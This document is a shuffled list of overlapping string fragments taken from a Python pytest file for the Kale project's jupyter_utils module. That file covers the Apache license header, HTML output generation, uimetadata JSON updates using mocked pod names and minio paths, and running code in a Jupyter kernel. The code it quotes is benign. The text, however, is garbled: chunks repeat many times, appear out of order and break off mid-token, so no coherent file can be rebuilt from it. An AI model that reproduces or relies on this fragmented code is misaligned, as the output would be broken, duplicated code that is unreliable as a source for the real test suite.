"exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir,",
"OF ANY KIND, either express or implied. # See the License for the",
"markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base =",
"os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check",
"= os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) #",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test",
"pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp",
"'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base,",
"'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda",
"correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base",
"markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w'))",
"== target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code():",
"has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app',",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs)",
"pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update",
"json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]}",
"jupyter kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", )",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value =",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"the License. import os import json import pytest from testfixtures import mock from",
"tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated =",
"return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}),",
"[markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target",
"== ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when",
"= {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def",
"that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value =",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base =",
"{\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target",
"required by applicable law or agreed to in writing, software # distributed under",
"a jupyter kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\",",
"pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = { 'type': 'markdown',",
"test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does not exists.\"\"\"",
"applicable law or agreed to in writing, software # distributed under the License",
"2020 The Kale Authors # # Licensed under the Apache License, Version 2.0",
"target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated",
"or agreed to in writing, software # distributed under the License is distributed",
"The Kale Authors # # Licensed under the Apache License, Version 2.0 (the",
"file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value =",
"{\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated ==",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown",
"filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file",
"code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code",
"filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath)",
"def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" #",
"under the License. import os import json import pytest from testfixtures import mock",
"\"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\"",
"\"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # ---",
"= { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\":",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"License. # You may obtain a copy of the License at # #",
"'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")),",
"(_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")),",
"target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace",
"the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns'",
"compliance with the License. # You may obtain a copy of the License",
"is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk'",
"updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source':",
"'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test",
"limitations under the License. import os import json import pytest from testfixtures import",
"pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\": []} filepath",
"for the specific language governing permissions and # limitations under the License. import",
"# `data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"--- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}),",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata",
"file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, {",
"Kale Authors # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) #",
"jupyter_utils as ju def _output_display(data): # `data` must be a list return [{'output_type':",
"not use this file except in compliance with the License. # You may",
"[{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\",",
"check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{",
"= {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp",
"\"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")),",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\"",
"import jupyter_utils as ju def _output_display(data): # `data` must be a list return",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some",
"ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert",
"from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the",
"list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png':",
"when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value =",
"= 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file",
"import os import json import pytest from testfixtures import mock from kale.utils import",
"= 'test_wk' # create base tmp file markdown = { 'type': 'markdown', 'storage':",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\":",
"# limitations under the License. import os import json import pytest from testfixtures",
"correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source':",
"# you may not use this file except in compliance with the License.",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the",
"correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio',",
"kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code)",
"agreed to in writing, software # distributed under the License is distributed on",
"(the \"License\"); # you may not use this file except in compliance with",
"inside a jupyter kernel successfully.\"\"\" # test standard code code = (\"a =",
"# Unless required by applicable law or agreed to in writing, software #",
"governing permissions and # limitations under the License. import os import json import",
"by applicable law or agreed to in writing, software # distributed under the",
"open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"import json import pytest from testfixtures import mock from kale.utils import jupyter_utils as",
"ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact",
"tmpdir): \"\"\"Test the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value",
"\"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def",
"--- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from",
"file except in compliance with the License. # You may obtain a copy",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test',",
"tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' }",
"updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio',",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test",
"License for the specific language governing permissions and # limitations under the License.",
"to in writing, software # distributed under the License is distributed on an",
"# --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs,",
"= os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has",
"implied. # See the License for the specific language governing permissions and #",
"'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated",
"\"License\"); # you may not use this file except in compliance with the",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir):",
"new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter",
"'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file",
"check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown,",
"Python code runs inside a jupyter kernel successfully.\"\"\" # test standard code code",
"'#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath,",
"= json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]}",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils,",
"the specific language governing permissions and # limitations under the License. import os",
"or implied. # See the License for the specific language governing permissions and",
"target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert",
"([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"),",
"# check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\":",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"os import json import pytest from testfixtures import mock from kale.utils import jupyter_utils",
"standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the",
"data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # ---",
"mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update",
"file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base",
"'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath",
"target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace",
"runs inside a jupyter kernel successfully.\"\"\" # test standard code code = (\"a",
"ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it",
"= 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') #",
"json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert",
"does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"you may not use this file except in compliance with the License. #",
"ju def _output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data':",
"--- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain':",
"has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type':",
"'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir,",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir):",
"Copyright 2020 The Kale Authors # # Licensed under the Apache License, Version",
"== target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated",
"use this file except in compliance with the License. # You may obtain",
"generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test",
"# Copyright 2020 The Kale Authors # # Licensed under the Apache License,",
"\"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), #",
"been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app',",
"# --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript':",
"(_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests",
"uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside a",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"= 'test_wk' # create base tmp file base = {\"outputs\": []} filepath =",
"[{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils')",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown =",
"[]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test',",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that",
"# # Unless required by applicable law or agreed to in writing, software",
"express or implied. # See the License for the specific language governing permissions",
"specific language governing permissions and # limitations under the License. import os import",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file",
"code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code =",
"either express or implied. # See the License for the specific language governing",
"ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target",
"\"\"\"Test the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value =",
"= (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some",
"not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath =",
"pytest from testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data):",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"\"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def",
"base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update",
"# --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation",
"the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod'",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\"",
"\"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" # test standard",
"outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file",
"assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is",
"updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code",
"the License. # You may obtain a copy of the License at #",
"update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated",
"= {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated ==",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"--- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target):",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp",
"kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be a list",
"def _output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data': data}]",
"# create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source':",
"import pytest from testfixtures import mock from kale.utils import jupyter_utils as ju def",
"base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown'",
"testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data`",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = {",
"= {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file",
"updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage':",
"def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value",
"target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created",
"with the License. # You may obtain a copy of the License at",
"# create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target ==",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"# --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # ---",
"uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value",
"'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x:",
"ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), #",
"law or agreed to in writing, software # distributed under the License is",
"html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils,",
"the License for the specific language governing permissions and # limitations under the",
"]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\": []}",
"uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target =",
"Authors # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type':",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"language governing permissions and # limitations under the License. import os import json",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)",
"\"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html",
"json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has",
